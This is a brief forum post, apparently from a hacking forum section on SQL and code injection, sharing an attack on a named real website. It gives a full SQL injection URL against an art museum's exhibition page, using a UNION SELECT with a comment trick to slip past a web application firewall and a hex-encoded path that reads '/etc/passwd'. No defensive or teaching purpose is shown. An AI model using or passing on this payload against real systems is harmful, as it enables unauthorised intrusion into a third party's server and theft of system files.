its have waf i think :) but i found another nice point
http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 = '../../../../../etc/passwd'
look at this;
http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+
Forum:
SQL and Code Injection